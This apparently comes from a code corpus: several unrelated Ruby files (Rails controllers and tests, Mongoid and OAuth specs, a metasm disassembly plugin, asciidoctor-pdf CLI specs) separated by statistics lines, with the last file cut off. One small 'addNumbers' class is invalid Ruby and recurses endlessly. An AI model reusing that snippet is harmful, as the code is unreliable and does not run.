unless resource_pool.nil?
vm.change_cpu_count Integer(resource_pool['cpu'])
vm.change_memory Integer(resource_pool['ram'])
vm.add_hard_disk Integer(resource_pool['disk'])
end
unless networks.nil?
vm.delete_nic *vm.hardware_section.nics
networks.values.each_with_index do |network, nic_index|
name = network['cloud_properties']['name']
vm.add_nic nic_index, name, VCloudSdk::Xml::IP_ADDRESSING_MODE[:MANUAL], network['ip']
vm.connect_nic nic_index, name, VCloudSdk::Xml::IP_ADDRESSING_MODE[:MANUAL], network['ip']
end
end
client.invoke_and_wait :post, vm.reconfigure_link,
:payload => vm,
:headers => { :content_type => VCloudSdk::Xml::MEDIA_TYPE[:VM] }
state[:vm] = client.reload vm
end
end
end
end
| 34.361111 | 102 | 0.625707 |
bb375076c67c581df7637af1f33c6454207b0e79 | 6,149 | # encoding: utf-8
require 'abstract_unit'
require 'action_view/dependency_tracker'
class NeckbeardTracker
def self.call(name, template)
["foo/#{name}"]
end
end
class FakeTemplate
attr_reader :source, :handler
def initialize(source, handler = Neckbeard)
@source, @handler = source, handler
end
end
Neckbeard = lambda {|template| template.source }
Bowtie = lambda {|template| template.source }
class DependencyTrackerTest < ActionView::TestCase
def tracker
ActionView::DependencyTracker
end
def setup
ActionView::Template.register_template_handler :neckbeard, Neckbeard
tracker.register_tracker(:neckbeard, NeckbeardTracker)
end
def teardown
ActionView::Template.unregister_template_handler :neckbeard
tracker.remove_tracker(:neckbeard)
end
def test_finds_tracker_by_template_handler
template = FakeTemplate.new("boo/hoo")
dependencies = tracker.find_dependencies("boo/hoo", template)
assert_equal ["foo/boo/hoo"], dependencies
end
def test_returns_empty_array_if_no_tracker_is_found
template = FakeTemplate.new("boo/hoo", Bowtie)
dependencies = tracker.find_dependencies("boo/hoo", template)
assert_equal [], dependencies
end
end
class ERBTrackerTest < Minitest::Test
def make_tracker(name, template)
ActionView::DependencyTracker::ERBTracker.new(name, template)
end
def test_dependency_of_erb_template_with_number_in_filename
template = FakeTemplate.new("<%# render 'messages/message123' %>", :erb)
tracker = make_tracker("messages/_message123", template)
assert_equal ["messages/message123"], tracker.dependencies
end
def test_dependency_of_template_partial_with_layout
skip # FIXME: Needs to be fixed properly, right now we can only match one dependency per line. Need multiple!
template = FakeTemplate.new("<%# render partial: 'messages/show', layout: 'messages/layout' %>", :erb)
tracker = make_tracker("multiple/_dependencies", template)
assert_equal ["messages/layout", "messages/show"], tracker.dependencies
end
def test_dependency_of_template_layout_standalone
template = FakeTemplate.new("<%# render layout: 'messages/layout' do %>", :erb)
tracker = make_tracker("messages/layout", template)
assert_equal ["messages/layout"], tracker.dependencies
end
def test_finds_dependency_in_correct_directory
template = FakeTemplate.new("<%# render(message.topic) %>", :erb)
tracker = make_tracker("messages/_message", template)
assert_equal ["topics/topic"], tracker.dependencies
end
def test_finds_dependency_in_correct_directory_with_underscore
template = FakeTemplate.new("<%# render(message_type.messages) %>", :erb)
tracker = make_tracker("message_types/_message_type", template)
assert_equal ["messages/message"], tracker.dependencies
end
def test_dependency_of_erb_template_with_no_spaces_after_render
template = FakeTemplate.new("<%# render'messages/message' %>", :erb)
tracker = make_tracker("messages/_message", template)
assert_equal ["messages/message"], tracker.dependencies
end
def test_finds_no_dependency_when_render_begins_the_name_of_an_identifier
template = FakeTemplate.new("<%# rendering 'it useless' %>", :erb)
tracker = make_tracker("resources/_resource", template)
assert_equal [], tracker.dependencies
end
def test_finds_no_dependency_when_render_ends_the_name_of_another_method
template = FakeTemplate.new("<%# surrender 'to reason' %>", :erb)
tracker = make_tracker("resources/_resource", template)
assert_equal [], tracker.dependencies
end
def test_finds_dependency_on_multiline_render_calls
template = FakeTemplate.new("<%#
render :object => @all_posts,
:partial => 'posts' %>", :erb)
tracker = make_tracker("some/_little_posts", template)
assert_equal ["some/posts"], tracker.dependencies
end
def test_finds_multiple_unrelated_odd_dependencies
template = FakeTemplate.new("
<%# render('shared/header', title: 'Title') %>
<h2>Section title</h2>
<%# render@section %>
", :erb)
tracker = make_tracker("multiple/_dependencies", template)
assert_equal ["shared/header", "sections/section"], tracker.dependencies
end
def test_finds_dependencies_for_all_kinds_of_identifiers
template = FakeTemplate.new("
<%# render $globals %>
<%# render @instance_variables %>
<%# render @@class_variables %>
", :erb)
tracker = make_tracker("identifiers/_all", template)
assert_equal [
"globals/global",
"instance_variables/instance_variable",
"class_variables/class_variable"
], tracker.dependencies
end
def test_finds_dependencies_on_method_chains
template = FakeTemplate.new("<%# render @parent.child.grandchildren %>", :erb)
tracker = make_tracker("method/_chains", template)
assert_equal ["grandchildren/grandchild"], tracker.dependencies
end
def test_finds_dependencies_with_special_characters
template = FakeTemplate.new("<%# render @pokémon, partial: 'ピカチュウ' %>", :erb)
tracker = make_tracker("special/_characters", template)
assert_equal ["special/ピカチュウ"], tracker.dependencies
end
def test_finds_dependencies_with_quotes_within
template = FakeTemplate.new(%{
<%# render "single/quote's" %>
<%# render 'double/quote"s' %>
}, :erb)
tracker = make_tracker("quotes/_single_and_double", template)
assert_equal ["single/quote's", 'double/quote"s'], tracker.dependencies
end
def test_finds_dependencies_with_extra_spaces
template = FakeTemplate.new(%{
<%= render "header" %>
<%= render partial: "form" %>
<%= render @message %>
<%= render ( @message.events ) %>
<%= render :collection => @message.comments,
:partial => "comments/comment" %>
}, :erb)
tracker = make_tracker("spaces/_extra", template)
assert_equal [
"spaces/header",
"spaces/form",
"messages/message",
"events/event",
"comments/comment"
], tracker.dependencies
end
end
| 31.213198 | 113 | 0.713612 |
2185a876752a469fef8603333fc972065add1f55 | 2,042 | # This file is part of Metasm, the Ruby assembly manipulation suite
# Copyright (C) 2006-2009 Yoann GUILLOT
#
# Licence is LGPL, see LICENCE in the top-level directory
# metasm dasm plugin: retrieve a section section, and disassemble everything it can, skipping existing code and nops
# usage: load the plugin, then call (ruby snipped): dasm.dasm_all_section '.text'
def dasm_all(addrstart, length, method=:disassemble_fast_deep)
s = get_section_at(addrstart)
return if not s
s = s[0]
boff = s.ptr
off = 0
while off < length
if di = di_at(addrstart + off)
off += di.bin_length
elsif @decoded[addrstart+off]
off += 1
else
s.ptr = boff+off
maydi = cpu.decode_instruction(s, 0)
if not maydi
off += 1
elsif maydi.instruction.to_s =~ /nop|lea (.*), \[\1(?:\+0)?\]|mov (.*), \2|int 3/
off += maydi.bin_length
else
puts "dasm_all: found #{Expression[addrstart+off]}" if $VERBOSE
send(method, addrstart+off)
end
end
Gui.main_iter if gui and off & 15 == 0
end
count = 0
off = 0
while off < length
addr = addrstart+off
if di = di_at(addr)
if di.block_head?
b = di.block
if not @function[addr] and b.from_subfuncret.to_a.empty? and b.from_normal.to_a.empty?
l = auto_label_at(addr, 'sub_orph')
puts "dasm_all: found orphan function #{l}"
@function[addrstart+off] = DecodedFunction.new
@function[addrstart+off].finalized = true
detect_function_thunk(addr)
count += 1
end
end
off += di.bin_length
else
off += 1
end
Gui.main_iter if gui and off & 15 == 0
end
puts "found #{count} orphan functions" if $VERBOSE
gui.gui_update if gui
end
def dasm_all_section(name, method=:disassemble_fast_deep)
section_info.each { |n, a, l, i|
if name == n
dasm_all(Expression[a].reduce, l, method)
end
}
true
end
| 28.760563 | 117 | 0.604799 |
e8ea6a5394b322d017f2b61a4a88fbda2e65a325 | 1,747 | class UsersController < ApplicationController
before_action :set_user, only: %i[show edit update destroy]
# GET /users
# GET /users.json
def index
@users = User.all
end
# GET /users/1
# GET /users/1.json
def show; end
# GET /users/new
def new
@user = User.new
end
# GET /users/1/edit
def edit; end
# POST /users
# POST /users.json
def create
@user = User.new(user_params)
respond_to do |format|
if @user.save
format.html { redirect_to @user, notice: notice_m('created') }
format.json { render :show, status: :created, location: @user }
else
format.html { render :new }
format.json { render json: @user.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /users/1
# PATCH/PUT /users/1.json
def update
respond_to do |format|
if @user.update(user_params)
format.html { redirect_to @user, notice: notice_m('edited') }
format.json { render :show, status: :ok, location: @user }
else
format.html { render :edit }
format.json { render json: @user.errors, status: :unprocessable_entity }
end
end
end
# DELETE /users/1
# DELETE /users/1.json
def destroy
@user.destroy
respond_to do |format|
format.html { redirect_to users_url, notice: notice_m('destoyed') }
format.json { head :no_content }
end
end
private
def notice_m(word)
'User was successfully ' + word
end
# Use callbacks to share common setup or constraints between actions.
def set_user
@user = User.find(params[:id])
end
# Only allow a list of trusted parameters through.
def user_params
params.require(:user).permit(:name, :email)
end
end
| 22.397436 | 80 | 0.637092 |
9149d9401e9ee27a741b023707251e7fcbcbd5da | 2,442 | require "spec_helper"
describe Mongoid::Timestamps do
describe ".included" do
let(:document) do
Dokument.new
end
let(:fields) do
Dokument.fields
end
before do
document.run_callbacks(:create)
document.run_callbacks(:save)
end
it "adds created_at to the document" do
expect(fields["created_at"]).to_not be_nil
end
it "adds updated_at to the document" do
expect(fields["updated_at"]).to_not be_nil
end
it "forces the created_at timestamps to UTC" do
expect(document.created_at).to be_within(10).of(Time.now.utc)
end
it "forces the updated_at timestamps to UTC" do
expect(document.updated_at).to be_within(10).of(Time.now.utc)
end
it "ensures created_at equals updated_at on new records" do
expect(document.updated_at).to eq(document.created_at)
end
pending "includes a record_timestamps class_accessor to ease AR compatibility" do
expect(Dokument.new).to respond_to(:record_timestamps)
end
end
context "when the document has not changed" do
let(:document) do
Dokument.instantiate(Dokument.new.attributes)
end
before do
document.new_record = false
end
it "does not run the update callbacks" do
document.should_receive(:updated_at=).never
document.save
end
end
context "when the document has changed with updated_at specified" do
let(:document) do
Dokument.new(created_at: Time.now.utc)
end
before do
document.new_record = false
document.updated_at = DateTime.parse("2001-06-12")
end
it "does not set updated at" do
document.should_receive(:updated_at=).never
document.save
end
end
context "when the document is created" do
let!(:document) do
Dokument.create
end
it "runs the update callbacks" do
expect(document.updated_at).to eq(document.created_at)
end
end
context "when only embedded documents have changed" do
let!(:document) do
Dokument.create(updated_at: 2.days.ago)
end
let!(:address) do
document.addresses.create(street: "Karl Marx Strasse")
end
let!(:updated_at) do
document.updated_at
end
before do
address.number = 1
document.save
end
it "updates the root document updated at" do
expect(document.updated_at).to be_within(1).of(Time.now)
end
end
end
| 21.610619 | 85 | 0.67199 |
ff6cf2880bf5747e19d69ea42ffadc5b1045ff6d | 135 | class addNumbers
def self.one
x =+ 1
puts x
end
def self.five
5.times do addNumbers.five end
puts x
end
end
| 11.25 | 34 | 0.607407 |
113199085fed230420561d1becf10833fc2237d6 | 14,416 | #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# Copyright (c) 2016, Electric Power Research Institute (EPRI)
# All rights reserved.
#
# OpenADR ("this software") is licensed under BSD 3-Clause license.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of EPRI nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
#
# This EPRI software incorporates work covered by the following copyright and permission
# notices. You may not use these works except in compliance with their respective
# licenses, which are provided below.
#
# These works are provided by the copyright holders and contributors "as is" and any express or
# implied warranties, including, but not limited to, the implied warranties of merchantability
# and fitness for a particular purpose are disclaimed.
#
#########################################################################################
# MIT Licensed Libraries
#########################################################################################
#
# * actionmailer 3.2.12 (http://www.rubyonrails.org) - Email composition, delivery, and receiving framework (part of Rails).
# * actionpack 3.2.12 (http://www.rubyonrails.org) - Web-flow and rendering framework putting the VC in MVC (part of Rails).
# * activemodel 3.2.12 (http://www.rubyonrails.org) - A toolkit for building modeling frameworks (part of Rails).
# * activerecord 3.2.12 (http://www.rubyonrails.org) - Object-relational mapper framework (part of Rails).
# * activeresource 3.2.12 (http://www.rubyonrails.org) - REST modeling framework (part of Rails).
# * activesupport 3.2.12 (http://www.rubyonrails.org) - A toolkit of support libraries and Ruby core extensions extracted from the Rails framework.
# * arel 3.0.2 (http://github.com/rails/arel) - Arel is a SQL AST manager for Ruby
# * bootstrap-sass 3.1.1.0 (https://github.com/twbs/bootstrap-sass) - Twitter's Bootstrap, converted to Sass and ready to drop into Rails or Compass
# * builder 3.0.4 (http://onestepback.org) - Builders for MarkUp.
# * bundler 1.12.5 (http://bundler.io) - The best way to manage your application's dependencies
# * capybara 2.4.4 (http://github.com/jnicklas/capybara) - Capybara aims to simplify the process of integration testing Rack applications, such as Rails, Sinatra or Merb
# * coffee-rails 3.2.2 () - Coffee Script adapter for the Rails asset pipeline.
# * coffee-script-source 1.6.3 (http://jashkenas.github.com/coffee-script/) - The CoffeeScript Compiler
# * docile 1.1.5 (https://ms-ati.github.io/docile/) - Docile keeps your Ruby DSLs tame and well-behaved
# * edn 1.0.0 () - 'edn implements a reader for Extensible Data Notation by Rich Hickey.'
# * erubis 2.7.0 (http://www.kuwata-lab.com/erubis/) - a fast and extensible eRuby implementation which supports multi-language
# * execjs 1.4.0 (https://github.com/sstephenson/execjs) - Run JavaScript code from Ruby
# * factory_girl 4.5.0 (https://github.com/thoughtbot/factory_girl) - factory_girl provides a framework and DSL for defining and using model instance factories.
# * factory_girl_rails 4.5.0 (http://github.com/thoughtbot/factory_girl_rails) - factory_girl_rails provides integration between factory_girl and rails 3
# * gem-licenses 0.1.2 (http://github.com/dblock/gem-licenses) - List all gem licenses.
# * hike 1.2.3 (http://github.com/sstephenson/hike) - Find files in a set of paths
# * i18n 0.6.5 (http://github.com/svenfuchs/i18n) - New wave Internationalization support for Ruby
# * jdbc-postgresql 9.2.1000 (https://github.com/rosenfeld/jdbc-postgresql) - PostgresSQL jdbc driver for JRuby
# * journey 1.0.4 (http://github.com/rails/journey) - Journey is a router
# * jquery-rails 3.0.4 (http://rubygems.org/gems/jquery-rails) - Use jQuery with Rails 3
# * json-schema 2.6.2 (http://github.com/ruby-json-schema/json-schema/tree/master) - Ruby JSON Schema Validator
# * mail 2.4.4 (http://github.com/mikel/mail) - Mail provides a nice Ruby DSL for making, sending and reading emails.
# * metaclass 0.0.4 (http://github.com/floehopper/metaclass) - Adds a metaclass method to all Ruby objects
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
# * mocha 1.1.0 (http://gofreerange.com/mocha/docs) - Mocking and stubbing library
# * multi_json 1.7.9 (http://github.com/intridea/multi_json) - A common interface to multiple JSON libraries.
# * nokogiri 1.6.5 (http://nokogiri.org) - Nokogiri (鋸) is an HTML, XML, SAX, and Reader parser
# * polyglot 0.3.3 (http://github.com/cjheath/polyglot) - Augment 'require' to load non-Ruby file types
# * rack-test 0.6.2 (http://github.com/brynary/rack-test) - Simple testing API built on Rack
# * railties 3.2.12 (http://www.rubyonrails.org) - Tools for creating, working with, and running Rails applications.
# * rake 10.1.0 (http://rake.rubyforge.org) - Ruby based make-like utility.
# * rspec-core 2.14.3 (http://github.com/rspec/rspec-core) - rspec-core-2.14.3
# * rspec-expectations 2.14.0 (http://github.com/rspec/rspec-expectations) - rspec-expectations-2.14.0
# * rspec-mocks 2.14.1 (http://github.com/rspec/rspec-mocks) - rspec-mocks-2.14.1
# * rspec-rails 2.14.0 (http://github.com/rspec/rspec-rails) - rspec-rails-2.14.0
# * sass 3.2.9 (http://sass-lang.com/) - A powerful but elegant CSS compiler that makes CSS fun again.
# * sass-rails 3.2.6 () - Sass adapter for the Rails asset pipeline.
# * simplecov 0.9.0 (http://github.com/colszowka/simplecov) - Code coverage for Ruby 1.9+ with a powerful configuration library and automatic merging of coverage across test suites
# * spork 1.0.0rc3 (http://github.com/sporkrb/spork) - spork
# * therubyrhino 2.0.2 (http://github.com/cowboyd/therubyrhino) - Embed the Rhino JavaScript interpreter into JRuby
# * thor 0.18.1 (http://whatisthor.com/) - A scripting framework that replaces rake, sake and rubigen
# * tilt 1.4.1 (http://github.com/rtomayko/tilt/) - Generic interface to multiple Ruby template engines
# * treetop 1.4.14 (https://github.com/cjheath/treetop) - A Ruby-based text parsing and interpretation DSL
# * uglifier 2.1.2 (http://github.com/lautis/uglifier) - Ruby wrapper for UglifyJS JavaScript compressor
# * xpath 2.0.0 (http://github.com/jnicklas/xpath) - Generate XPath expressions from Ruby
# * blankslate 2.1.2.4 (http://github.com/masover/blankslate) - BlankSlate extracted from Builder.
# * bourbon 3.1.8 (https://github.com/thoughtbot/bourbon) - Bourbon Sass Mixins using SCSS syntax.
# * coffee-script 2.2.0 (http://github.com/josh/ruby-coffee-script) - Ruby CoffeeScript Compiler
# * diff-lcs 1.2.4 (http://diff-lcs.rubyforge.org/) - Diff::LCS computes the difference between two Enumerable sequences using the McIlroy-Hunt longest common subsequence (LCS) algorithm
# * jquery-ui-rails 4.0.3 (https://github.com/joliss/jquery-ui-rails) - jQuery UI packaged for the Rails asset pipeline
# * parslet 1.4.0 (http://kschiess.github.com/parslet) - Parser construction library with great error reporting in Ruby.
# * rack 1.4.5 (http://rack.github.com/) - a modular Ruby webserver interface
# * rack-cache 1.2 (http://tomayko.com/src/rack-cache/) - HTTP Caching for Rack
# * rack-ssl 1.3.3 (https://github.com/josh/rack-ssl) - Force SSL/TLS in your app.
# * rails 3.2.12 (http://www.rubyonrails.org) - Full-stack web application framework.
# * simplecov-html 0.8.0 (https://github.com/colszowka/simplecov-html) - Default HTML formatter for SimpleCov code coverage tool for ruby 1.9+
# * tzinfo 0.3.37 (http://tzinfo.rubyforge.org/) - Daylight-savings aware timezone library
# * warbler 1.4.0.beta1 (http://caldersphere.rubyforge.org/warbler) - Warbler chirpily constructs .war files of your Rails applications.
#
#########################################################################################
# BSD Licensed Libraries
#########################################################################################
#
# * activerecord-jdbc-adapter 1.2.9.1 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 2006-2012 Nick Sieger <[email protected]>, Copyright (c) 2006-2008 Ola Bini <[email protected]>
# * jdbc-postgres 9.2.1004 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 1997-2011, PostgreSQL Global Development Group
# * d3js 3.5.16 (https://d3js.org/) Copyright (c) 2015 Mike Bostock
#
#########################################################################################
# Ruby Licensed Libraries
#########################################################################################
#
# * json 1.8.0 (http://json-jruby.rubyforge.org/) - JSON implementation for JRuby
# * rubyzip 0.9.9 (http://github.com/aussiegeek/rubyzip) - rubyzip is a ruby module for reading and writing zip files
# * httpclient 2.3.4.1 (http://github.com/nahi/httpclient) - gives something like the functionality of libwww-perl (LWP) in Ruby
# * test-unit 2.5.5 (http://test-unit.rubyforge.org/) - test-unit - Improved version of Test::Unit bundled in Ruby 1.8.x.
#
#########################################################################################
# Public domain - creative commons Licensed Libraries
#########################################################################################
#
# * torquebox 3.1.2 (http://torquebox.org/) - TorqueBox Gem
# * torquebox-cache 3.1.2 (http://torquebox.org/) - TorqueBox Cache Gem
# * torquebox-configure 3.1.2 (http://torquebox.org/) - TorqueBox Configure Gem
# * torquebox-core 3.1.2 (http://torquebox.org/) - TorqueBox Core Gem
# * torquebox-messaging 3.1.2 (http://torquebox.org/) - TorqueBox Messaging Client
# * torquebox-naming 3.1.2 (http://torquebox.org/) - TorqueBox Naming Client
# * torquebox-rake-support 3.1.2 (http://torquebox.org/) - TorqueBox Rake Support
# * torquebox-security 3.1.2 (http://torquebox.org/) - TorqueBox Security Gem
# * torquebox-server 3.1.2 (http://torquebox.org/) - TorqueBox Server Gem
# * torquebox-stomp 3.1.2 (http://torquebox.org/) - TorqueBox STOMP Support
# * torquebox-transactions 3.1.2 (http://torquebox.org/) - TorqueBox Transactions Gem
# * torquebox-web 3.1.2 (http://torquebox.org/) - TorqueBox Web Gem
#
#########################################################################################
# Apache Licensed Libraries
#########################################################################################
#
# * addressable 2.3.8 (https://github.com/sporkmonger/addressable) - URI Implementation
# * bcrypt-ruby 3.0.1 (http://bcrypt-ruby.rubyforge.org) - OpenBSD's bcrypt() password hashing algorithm.
# * database_cleaner 1.4.0 (http://github.com/bmabey/database_cleaner) - Strategies for cleaning databases. Can be used to ensure a clean state for testing.
# * annotate 2.5.0 (http://github.com/ctran/annotate_models) - Annotates Rails Models, routes, fixtures, and others based on the database schema.
# * nvd3 1.8.4 (http://nvd3.org/) Copeyright (c) 2014 Novus Partners - chart library based on d3js
# * smack 3.3.1 (https://www.igniterealtime.org/projects/smack/) - XMPP library
#
#########################################################################################
# LGPL
#########################################################################################
#
# * jruby-1.7.4
# * jruby-jars 1.7.4 (http://github.com/jruby/jruby/tree/master/gem/jruby-jars) - The core JRuby code and the JRuby stdlib as jar
# ** JRuby is tri-licensed GPL, LGPL, and EPL.
#
#########################################################################################
# MPL Licensed Libraries
#########################################################################################
#
# * therubyrhino_jar 1.7.4 (http://github.com/cowboyd/therubyrhino) - Rhino's jars packed for therubyrhino
#
#########################################################################################
# Artistic 2.0
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
#
#########################################################################################
# GPL-2
#########################################################################################
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
# No License Given
#########################################################################################
#
# * spork-testunit 0.0.8 (http://github.com/timcharper/spork-testunit) - spork-testunit
# * sprockets 2.2.2 (http://getsprockets.org/) - Rack-based asset packaging system
#
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
class CreateProfiles < ActiveRecord::Migration
def change
create_table :profiles do |t|
t.string :name
t.timestamps
end
end
end
| 73.177665 | 206 | 0.636792 |
627af19b5e9521eb7ee83d8f4ca67f4e2028fd06 | 974 | require 'spec_helper'
describe 'user:reset_login_tokens' do
include_context 'rake'
let!(:first_user) { create_user(email: '[email protected]') }
let!(:second_user) { create_user(email: '[email protected]') }
before do
first_user.update_attribute('modified', 10.days.ago)
second_user.update_attribute('modified', 10.days.ago)
end
it 'updates all login tokens for users and does not update the modified date' do
subject.invoke
updated_first_user = Plink::UserRecord.find(first_user.id)
updated_second_user = Plink::UserRecord.find(second_user.id)
updated_first_user.login_token.should_not == first_user.login_token
updated_first_user.modified.to_date.should == first_user.modified.to_date
updated_second_user.login_token.should_not == second_user.login_token
updated_second_user.modified.to_date.should == second_user.modified.to_date
updated_first_user.login_token.should_not == updated_second_user.login_token
end
end
| 37.461538 | 82 | 0.777207 |
5da611217c50d36ee5e16a135ca8b04a8646716d | 44 | module ShippingEasy
VERSION = "0.7.1"
end
| 11 | 19 | 0.704545 |
91a6a08bf139b2e18e1dcc3ff92a9bcbed65ca20 | 749 | require 'spec_helper'
describe Project do
let(:url) { '[email protected]:joelmoss/strano.git' }
let(:user) { FactoryGirl.create(:user) }
let(:cloned_project) { FactoryGirl.build_stubbed(:project) }
before(:each) do
Github.strano_user_token = user.github_access_token
@project = Project.create :url => url
end
it "should set the github data after save", :vcr => { :cassette_name => 'Github_Repo/_repo' } do
@project.github_data.should_not be_empty
end
describe "#repo", :vcr => { :cassette_name => 'Github_Repo/_repo' } do
it { @project.repo.should be_a(Strano::Repo) }
end
describe "#github", :vcr => { :cassette_name => 'Github_Repo/_repo' } do
it { @project.github.should be_a(Github::Repo) }
end
end
| 27.740741 | 98 | 0.680908 |
26b4b4ebc860bb9dc541cd6e184099e49c24107a | 3,209 | require File.dirname(__FILE__) + '/../../spec_helper'
describe Users::OpenAuthenticationsController do
before(:each) do
controller.set_current_user = nil
end
before(:all) do
truncate_all_tables
Language.create_english
CuratorLevel.create_enumerated
@user = User.gen
@other_user = User.gen
@admin = User.gen(:admin => true)
end
describe 'GET index' do
it 'should only be accessible by self and administrators' do
controller.set_current_user = @user
get :index, {:user_id => @user.id}
assigns[:user].should == @user
response.should render_template('users/open_authentications/index')
controller.set_current_user = @other_user
expect { get :index, {:user_id => @user.id} }.
to raise_error(EOL::Exceptions::SecurityViolation)
controller.set_current_user = @admin
get :index, {:user_id => @user.id}
response.code.should == '200'
controller.set_current_user = nil
expect { get :index, {:user_id => @user.id} }.
to raise_error(EOL::Exceptions::SecurityViolation)
end
end
describe 'GET new' do
it 'should redirect to index unless we have an oauth provider param' do
get :new, {:user_id => @user.id}, {:user_id => @user.id}
expect(response).to redirect_to(user_open_authentications_url(@user.id))
end
it 'should only be accessible by self or admin' do
oauth = double(EOL::OpenAuth, access_denied?: false, authorized?: false, session_data: {}, authorize_uri: '')
EOL::OpenAuth.stub(:init) { oauth }
controller.set_current_user = @user
expect { get :new, { :user_id => @user.id, :oauth_provider => 'provider'} }.not_to raise_error
controller.set_current_user = @admin
expect { get :new, { :user_id => @user.id, :oauth_provider => 'provider'} }.not_to raise_error
controller.set_current_user = nil
expect { get :new, { :user_id => @user.id, :oauth_provider => 'provider'} }.
to raise_error(EOL::Exceptions::SecurityViolation)
end
it 'should redirect to authorize uri when adding connection to Facebook' do
get :new, { :user_id => @user.id, :oauth_provider => 'facebook' }, {:user_id => @user.id}
response.header['Location'].should =~ /^https:\/\/graph.facebook.com\/oauth\/authorize/
end
it 'should redirect to authorize uri when adding connection to Google' do
get :new, { :user_id => @user.id, :oauth_provider => 'google' }, {:user_id => @user.id}
response.header['Location'].should =~ /^https:\/\/accounts.google.com\/o\/oauth2\/auth/
end
it 'should redirect to authorize uri when adding connection to Twitter' do
stub_oauth_requests
get :new, { :user_id => @user.id, :oauth_provider => 'twitter' }, {:user_id => @user.id}
response.header['Location'].should =~ /https:\/\/api.twitter.com\/oauth\/authenticate/
end
it 'should redirect to authorize uri when adding connection to Yahoo' do
stub_oauth_requests
get :new, { :user_id => @user.id, :oauth_provider => 'yahoo' }, {:user_id => @user.id}
response.header['Location'].should =~ /https:\/\/api.login.yahoo.com\/oauth\/v2\/request_auth/
end
end
end
| 43.364865 | 115 | 0.662823 |
5dfcb3f829aa28d9d3fd899419f3dcc1aac96b1e | 4,284 | # frozen_string_literal: true
require_relative 'spec_helper'
describe 'asciidoctor-pdf' do
context 'Packaging' do
it 'should install bin script named asciidoctor-pdf' do
bin_script = (Pathname.new Gem.bindir) / 'asciidoctor-pdf'
bin_script = Pathname.new Gem.bin_path 'asciidoctor-pdf', 'asciidoctor-pdf' unless bin_script.exist?
(expect bin_script).to exist
end
end
context 'Options' do
it 'should print the version of Asciidoctor PDF to stdout when invoked with the -V flag', cli: true do
out, _, res = run_command asciidoctor_pdf_bin, '-V'
(expect res.exitstatus).to be 0
(expect out).to include %(Asciidoctor PDF #{Asciidoctor::PDF::VERSION} using Asciidoctor #{Asciidoctor::VERSION})
end
end
context 'Require' do
it 'should load converter if backend is pdf and require is asciidoctor-pdf', cli: true do
out, err, res = run_command asciidoctor_bin, '-r', 'asciidoctor-pdf', '-b', 'pdf', '-D', output_dir, (fixture_file 'hello.adoc'), use_bundler: true
(expect res.exitstatus).to be 0
(expect out).to be_empty
(expect err).to be_empty
(expect Pathname.new output_file 'hello.pdf').to exist
end
it 'should load converter if backend is pdf and require is asciidoctor/pdf', cli: true do
out, err, res = run_command asciidoctor_bin, '-r', 'asciidoctor/pdf', '-b', 'pdf', '-D', output_dir, (fixture_file 'hello.adoc'), use_bundler: true
(expect res.exitstatus).to be 0
(expect out).to be_empty
(expect err).to be_empty
(expect Pathname.new output_file 'hello.pdf').to exist
end
end if defined? Bundler
context 'Examples' do
it 'should convert the basic example', cli: true, visual: true do
out, err, res = run_command asciidoctor_pdf_bin, '-D', output_dir, (example_file 'basic-example.adoc')
(expect res.exitstatus).to be 0
(expect out).to be_empty
(expect err).to be_empty
reference_file = File.absolute_path example_file 'basic-example.pdf'
(expect output_file 'basic-example.pdf').to visually_match reference_file
end
it 'should convert the chronicles example', cli: true, visual: true do
out, err, res = run_command asciidoctor_pdf_bin, '-D', output_dir, (example_file 'chronicles-example.adoc')
(expect res.exitstatus).to be 0
(expect out).to be_empty
(expect err).to be_empty
reference_file = File.absolute_path example_file 'chronicles-example.pdf'
(expect output_file 'chronicles-example.pdf').to visually_match reference_file
end unless ENV['ROUGE_VERSION'] && ENV['ROUGE_VERSION'].split[-1] < '2.1.0'
end
context 'redirection' do
it 'should be able to write output to file via stdout', cli: true do
run_command asciidoctor_pdf_bin, '-o', '-', (fixture_file 'book.adoc'), out: (to_file = output_file 'book.pdf')
(expect Pathname.new to_file).to exist
(expect { PDF::Reader.new to_file }).not_to raise_exception
end
end unless windows? && RUBY_ENGINE == 'jruby'
context 'pdfmark' do
it 'should generate pdfmark file if pdfmark attribute is set', cli: true do
out, err, res = run_command asciidoctor_pdf_bin, '-D', output_dir, '-a', 'pdfmark', (fixture_file 'book.adoc')
